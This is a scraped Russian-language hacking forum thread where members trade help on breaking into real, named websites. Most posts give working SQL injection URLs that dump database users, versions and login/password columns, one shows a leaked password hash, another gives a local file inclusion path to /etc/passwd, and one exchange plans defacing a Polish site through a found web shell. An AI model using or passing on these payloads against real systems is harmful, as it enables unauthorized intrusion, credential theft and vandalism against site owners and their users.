Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/*
    Помогите новичку дальше незнаю что делать :)
     
  2. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    _http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,0+from+users/*


    HTML:
    Table [banners]  Table [catalog]  Table [catalog_picture]  Table [catalog_struct]  Table [catalog_text]  Table [db_pics]  Table [feature_bind]  Table [feature_group]  Table [feature_type]  Table [fotobank]  Table [invoice]  Table [link_catalog]  Table [manufactures]  Table [news]  Table [pages]  Table [pricelist]  Table [tovar]  Table [users]
     
  3. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Спс биг а как мне терь найти папку с бд
     
  4. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    ?item=-1+union+select+1,2,concat_ws(char(58),user(),database(),version()),4,5,6,7,8,9,0/*
    user: [email protected]
    database: u13238_2
    version: 5.0.45-log
    подбирай таблици..
     
  5. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
     
  6. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    нет
     
  7. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а как не локальный сервер получить майсикьюла пробывал некоторые значения не прокатило*?
     
  8. Don Anton

    Don Anton Elder - Старейшина

    Joined:
    28 Feb 2008
    Messages:
    35
    Likes Received:
    121
    Reputations:
    4
    должно пройти, не может быть
     
  9. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    Вот он мне выдаёт
    4

    версия 4.1.9|используемая база db2255b| на запрос пасса 606717756665bce6|юзер us2255a@localhost

    6, Хитрый Чен=))
     
  10. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Ситуация: Откопал кем-то залитый ремвью на кажись польский сайт. получил доступ к базе. Прав на запись нету. Есть логин\пасс админа, правда чет не заходит :) может не туда ввожу, сайт-то польский.
    Что можно сделать кроме как удалить\перезалить базу? :)
     
  11. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    что душе угодно )
     
  12. AARON

    AARON Elder - Старейшина

    Joined:
    29 Apr 2008
    Messages:
    62
    Likes Received:
    14
    Reputations:
    1
    Ну тогда помоги, пожалуйста, задефейсить :) Или хоть направь куда копать. Поиск не помог.
     
  13. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    редактируй index.php
     
  14. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    при запросе id=2'
    получаю сообщение
    DBI debuging message / Отладочное сообщение DBI
    Error / Ошибка Could not Parse Query
    Query / Запрос select id,one,name from pb_portal where id=2\'
    Description / Описание You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    там как я понял фильтрация какаято, хелп
    http://www.paintball.ru/next.php?id=2'
     
  15. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
     
  16. Girsoft

    Girsoft New Member

    Joined:
    22 Jan 2007
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    И ещё подскажите. Вот ситуация:

    Есть локальный инклуд. логов не нашёл. На поддомене есть форум. адресв вида:

    forum.site.ru
    и есть возможность туда загружать файлы. Но вот проблема: я не знаю как прописать путь до форума! Если ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124)

    site.ru/forum/ не катит =(

    site.ru/ins.php?inc=../../../etc/passwd%00

    кто что думает по данному поводу?
     
  17. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    SQL Databases

    пробуй httpd.conf поискать...

    https://forum.antichat.ru/showthread.php?t=30632

    не обязательно... ;)
     
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что тут можно зделать ?
    и вот тут
    а также здесь знаю что юнион использовать нельзя.. но все же..
    netframework - хз как разкрутить..
    SVAROG
    баян..
     
  19. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),database(),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 sabe

    http://interfilm.ru/takelogin.php
    Пишет что нет коннекта с базой, что ты хочешь от него

    Сдесь пятая ветка без вывода,подзапросы:
    http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1,1)=5/*

    Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
    http://www.aldebaran.ru/gb/index.php?entry=25,1/*
    тоесть никак

    это ошибка введённых данных использовать можно только расскрытие пути
    http://zman.com/news/category.aspx?CategoryId=20
     
    1 person likes this.
Thread Status:
Not open for further replies.